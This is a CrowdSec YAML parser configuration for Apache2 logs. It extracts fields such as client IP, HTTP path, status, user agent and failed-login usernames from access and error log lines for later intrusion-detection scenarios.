---
# crowdsecurity/apache2-logs — s01-parse stage parser for Apache2 logs.
# Node 1 handles the access log, node 2 the error log. Each node fills
# the evt.Meta keys (log_type, service, source_ip, http_*) that later
# parser stages and scenarios read.
name: crowdsecurity/apache2-logs
description: 'Parse Apache2 access and error logs'

# Only events whose program name starts with 'apache2' enter this parser.
filter: "evt.Parsed.program startsWith 'apache2'"
onsuccess: next_stage
# debug: true

nodes:
  # ----- Access log ---------------------------------------------------
  # The line may be prefixed by "target_fqdn[:port] " ahead of the common
  # log format; referrer and user-agent are optional trailing fields.
  - grok:
      pattern: '(%{IPORHOST:target_fqdn}(:%{INT:port})? )?%{COMMONAPACHELOG}( "%{NOTDQUOTE:referrer}" "%{NOTDQUOTE:http_user_agent}")?'
      apply_on: message
      # Set once the grok pattern matched.
      statics:
        - meta: log_type
          value: http_access-log
        - target: evt.StrTime
          expression: evt.Parsed.timestamp
        - meta: service
          value: http
        # source_ip is the field downstream scenarios key decisions on.
        - meta: source_ip
          expression: evt.Parsed.clientip
        - meta: http_status
          expression: evt.Parsed.response
        # Use the parsed request when present, else the raw request
        # string that could not be split into verb/path/version.
        - meta: http_path
          expression: "evt.Parsed.request != '' ? evt.Parsed.request : evt.Parsed.rawrequest"
        - meta: http_verb
          expression: evt.Parsed.verb
        # NOTE(review): http_user_agent and target_fqdn are copied from
        # the logged request line as-is; scenarios matching on them
        # should treat them as untrusted text.
        - meta: http_user_agent
          expression: evt.Parsed.http_user_agent
        - meta: target_fqdn
          expression: evt.Parsed.target_fqdn
    onsuccess: next_stage

  # ----- Error log ----------------------------------------------------
  - grok:
      pattern: '%{HTTPD_ERRORLOG}'
      apply_on: message
    onsuccess: next_stage
    # Helper patterns shared by the sub-nodes below.
    pattern_syntax:
      NOT_DOUBLE_POINT: '[^:]+'
      NOT_DOUBLE_QUOTE: '[^"]+'
    # Sub-nodes refine the event by Apache module; each sets sub_type.
    nodes:
      # auth_basic: "Password Mismatch" or "user ... not found".
      - filter: "evt.Parsed.module == 'auth_basic'"
        onsuccess: next_stage
        pattern_syntax:
          EXTRACT_USER_AND_PATH: 'user %{NOT_DOUBLE_POINT:username}: authentication failure for "%{NOT_DOUBLE_QUOTE:target_uri}": Password Mismatch'
          EXTRACT_USER_AND_PATH2: 'user %{NOT_DOUBLE_POINT:username} not found: "?%{NOT_DOUBLE_QUOTE:target_uri}"?'
        grok:
          pattern: '%{EXTRACT_USER_AND_PATH}|%{EXTRACT_USER_AND_PATH2}'
          apply_on: message
          # Set whichever of the two alternatives matched.
          statics:
            - meta: username
              expression: evt.Parsed.username
            - meta: http_path
              expression: evt.Parsed.target_uri
            - meta: sub_type
              value: auth_fail

      # core: "Invalid URI in request <verb> <request> HTTP/<version>".
      - filter: "evt.Parsed.module == 'core' && evt.Parsed.message contains 'Invalid URI'"
        onsuccess: next_stage
        pattern_syntax:
          EXTRACT_URIVERB: 'Invalid URI in request %{WORD:verb} %{NOTSPACE:request}(?: HTTP/%{NUMBER:httpversion})'
        grok:
          pattern: '%{EXTRACT_URIVERB}'
          apply_on: message
          statics:
            - meta: http_path
              expression: evt.Parsed.request
            - meta: sub_type
              value: invalid_uri

      # authz_core: "client denied by server configuration: <uri>".
      - filter: "evt.Parsed.module == 'authz_core' && evt.Parsed.message contains 'client denied'"
        onsuccess: next_stage
        pattern_syntax:
          EXTRACT_PATH: 'client denied by server configuration: %{GREEDYDATA:target_uri}'
        grok:
          pattern: '%{EXTRACT_PATH}'
          apply_on: message
          statics:
            - meta: http_path
              expression: evt.Parsed.target_uri
            - meta: sub_type
              value: permission_denied

    # Node-level statics for every error-log line, whatever the module.
    statics:
      - meta: log_type
        value: http_error-log
      - target: evt.StrTime
        expression: evt.Parsed.timestamp
      - meta: service
        value: http
      # Error-log client address is captured as 'client', not 'clientip'.
      - meta: source_ip
        expression: evt.Parsed.client
      - meta: http_status
        expression: evt.Parsed.response